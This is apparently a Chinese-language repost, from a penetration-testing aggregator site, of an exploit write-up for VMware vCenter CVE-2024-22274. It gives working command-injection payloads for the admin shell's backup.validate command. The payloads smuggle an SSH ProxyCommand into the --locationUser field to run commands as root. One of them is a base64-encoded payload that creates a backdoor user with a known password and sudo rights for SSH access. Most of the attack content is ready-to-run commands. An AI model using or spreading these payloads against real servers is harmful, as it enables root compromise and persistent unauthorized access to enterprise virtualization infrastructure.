VMware vCenter RCE CVE-2024-22274 细节公开 !

渗透技巧 1个月前 admin
119 0 0

环境:

– VMware vCenter 8.0.0.10200 

– Photon Linux

VMware vCenter RCE CVE-2024-22274 细节公开 !


首先,通过ssh以admin用户登录到vcenter 的严格模式shell

VMware vCenter RCE CVE-2024-22274 细节公开 !

通过执行“admin”用户可用的多个API命令并检查使用“pspy”调用的底层系统命令

backup.validate --parts common --locationType SFTP --location nowhere --locationUser '-o ProxyCommand=;/bin/touch /tmp/root!!! 2>' --locationPassword

VMware vCenter RCE CVE-2024-22274 细节公开 !

可见,成功创建文件,并且文件属于root用户

VMware vCenter RCE CVE-2024-22274 细节公开 !

我们可以尝试创建一个新的本地用户

backup.validate --parts common --locationType SFTP --location nowhere --locationUser '-o ProxyCommand=;/bin/bash -c "{echo,dXNlcmFkZCBtYWxaICYmIGVjaG8gLWUgIk1hbElzSGVyZTEjXG5NYWxJc0hlcmUxIyIgfCBwYXNzd2QgbWFsWiA7IHVzZXJtb2QgLXMgL2Jpbi9iYXNoIG1hbFogJiYgdXNlcm1vZCAtYUcgc3VkbyBtYWxaCg==}|{base64,-d}|bash"  ↑的base64原文  useradd malZ && echo -e "MalIsHere1#nMalIsHere1#" | passwd malZ ; usermod -s /bin/bash malZ && usermod -aG sudo malZ

VMware vCenter RCE CVE-2024-22274 细节公开 !

成功创建恶意用户,然后只需要ssh这个用户即可

VMware vCenter RCE CVE-2024-22274 细节公开 !


VMware vCenter RCE CVE-2024-22274 细节公开 !



原文始发于微信公众号(合规渗透):VMware vCenter RCE CVE-2024-22274 细节公开 !

版权声明:admin 发表于 2024年7月25日 上午9:54。
转载请注明:VMware vCenter RCE CVE-2024-22274 细节公开 ! | CTF导航

相关文章